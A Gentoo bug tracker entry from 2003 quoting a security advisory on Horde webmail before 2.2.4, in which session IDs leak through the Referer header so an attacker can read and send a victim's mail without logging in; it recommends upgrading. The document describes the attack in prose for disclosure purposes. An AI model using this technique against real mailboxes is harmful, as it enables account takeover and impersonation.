Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 26804 - net-www/horde
Summary: net-www/horde
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: New packages (show other bugs)
Hardware: All Linux
: Highest critical (vote)
Assignee: Gentoo Security
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2003-08-17 07:02 UTC by Daniel Ahlberg (RETIRED)
Modified: 2003-09-01 07:25 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Daniel Ahlberg (RETIRED) gentoo-dev 2003-08-17 07:02:02 UTC 
> --------------------------- 
> PUCCIOLAB.ORG - ADVISORIES 
> <http://www.pucciolab.org> 
> --------------------------- 
> 
> PCL-0001: Remote Vulnerability in HORDE MTA < 2.2.4 
> 
> --------------------------------------------------------------------------- 
> PuCCiOLAB.ORG Security Advisories                      puccio@pucciolab.org 
> http://www.pucciolab.org                          Vincenzo 'puccio' Ciaglia 
> August 12th, 2003 
> --------------------------------------------------------------------------- 
> 
> Package        : Horde MTA 
> Vulnerability  : access to private account without login 
> Problem-Type   : remote 
> Version        : All < 2.2.4 
> Official Site  : http://horde.org/ 
> N
Comment 1 Daniel Ahlberg (RETIRED) gentoo-dev 2003-08-17 07:02:02 UTC 
> --------------------------- 
> PUCCIOLAB.ORG - ADVISORIES 
> <http://www.pucciolab.org> 
> --------------------------- 
> 
> PCL-0001: Remote Vulnerability in HORDE MTA < 2.2.4 
> 
> --------------------------------------------------------------------------- 
> PuCCiOLAB.ORG Security Advisories                      puccio@pucciolab.org 
> http://www.pucciolab.org                          Vincenzo 'puccio' Ciaglia 
> August 12th, 2003 
> --------------------------------------------------------------------------- 
> 
> Package        : Horde MTA 
> Vulnerability  : access to private account without login 
> Problem-Type   : remote 
> Version        : All < 2.2.4 
> Official Site  : http://horde.org/ 
> NĀ° Advisories  : 0001 
> 
> *********************** 
> Description of problem 
> ************************ 
> An attacker could send an email to the victim who ago use of HORDE MTA in 
> order to push it to visit a website. The website in issue log all the 
> accesses and describe in the particular the origin of every victim. 
> 
> Example: 
> ------------------- 
> MY STAT FOR MY WEBSITE - REFERENT DOMAIN 
> 
HTTP://MYSITE.MYSOCIETY.NET/HORDE/IMP/MESSAGE.PHP?HORDE=FC235847D2C8A88190C 
>879B290D12630&INDEX=XXX 
> 
> In this example, the victim has visualized our website reading the mail 
> that we have sent to it. Visiting the link marked from our counter of 
> accesses, we will be able to approach the page of management of the mail of 
> the victim and will be able to read and to send, calmly, its email without 
> to make the login.The session comes sluice after approximately 20 minutes 
> and the hacker it has the time to make its comfortable ones. 
> 
> ************************* 
> What could make a attacker? 
> ************************* 
> Read, write and fake your e-mail. Could send , from you email address, a 
> mail to your ISP and ask it User e PASS of your website.The consequences 
> would be catastrophic 
> 
> ************************* 
> What I can do ? 
> ************************* 
> Upgrade your MTA Agent to 2.2.4 version. 
> 
> Greet, 
> Vincenzo 'puccio' Ciaglia 
> www.pucciolab.org
Comment 2 Daniel Ahlberg (RETIRED) gentoo-dev 2003-09-01 07:25:40 UTC 
glsa sent